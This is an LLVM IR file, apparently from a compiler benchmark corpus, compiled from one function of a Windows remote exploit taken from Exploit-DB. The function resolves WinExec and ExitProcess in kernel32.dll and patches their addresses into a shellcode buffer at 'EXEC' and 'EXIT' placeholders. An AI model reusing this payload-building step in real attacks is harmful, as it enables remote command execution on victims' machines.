; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_21902.c_ModifyFuncAddr.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_21902.c_ModifyFuncAddr.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [17 x i8] c"0123456789ABCDEF\00", align 1
@.str.1 = private unnamed_addr constant [13 x i8] c"kernel32.dll\00", align 1
@.str.2 = private unnamed_addr constant [8 x i8] c"WinExec\00", align 1
@.str.3 = private unnamed_addr constant [12 x i8] c"ExitProcess\00", align 1
@stderr = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [55 x i8] c"Find WinExec at Address %x, ExitProcess at Address %x\0A\00", align 1
@.str.5 = private unnamed_addr constant [5 x i8] c"EXEC\00", align 1
@.str.6 = private unnamed_addr constant [5 x i8] c"EXIT\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @ModifyFuncAddr(i8* %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca i8*, align 8
  %4 = alloca i8*, align 8
  %5 = alloca i32, align 4
  %6 = alloca i8*, align 8
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  store i8* %0, i8** %3, align 8
  store i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str, i64 0, i64 0), i8** %4, align 8
  %9 = call i32 @LoadLibrary(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0))
  store i32 %9, i32* %5, align 4
  %10 = load i32, i32* %5, align 4
  %11 = call i32 @GetProcAddress(i32 %10, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.2, i64 0, i64 0))
  store i32 %11, i32* %7, align 4
  %12 = load i32, i32* %5, align 4
  %13 = call i32 @GetProcAddress(i32 %12, i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.3, i64 0, i64 0))
  store i32 %13, i32* %8, align 4
  %14 = load i32, i32* @stderr, align 4
  %15 = load i32, i32* %7, align 4
  %16 = load i32, i32* %8, align 4
  %17 = call i32 @fprintf(i32 %14, i8* getelementptr inbounds ([55 x i8], [55 x i8]* @.str.4, i64 0, i64 0), i32 %15, i32 %16)
  %18 = load i8*, i8** %3, align 8
  %19 = load i32, i32* %7, align 4
  %20 = call i32 @EncodeFuncAddr(i8* %18, i32 %19, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.5, i64 0, i64 0))
  %21 = load i8*, i8** %3, align 8
  %22 = load i32, i32* %8, align 4
  %23 = call i32 @EncodeFuncAddr(i8* %21, i32 %22, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.6, i64 0, i64 0))
  %24 = load i32, i32* %2, align 4
  ret i32 %24
}

declare dso_local i32 @LoadLibrary(i8*) #1

declare dso_local i32 @GetProcAddress(i32, i8*) #1

declare dso_local i32 @fprintf(i32, i8*, i32, i32) #1

declare dso_local i32 @EncodeFuncAddr(i8*, i32, i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
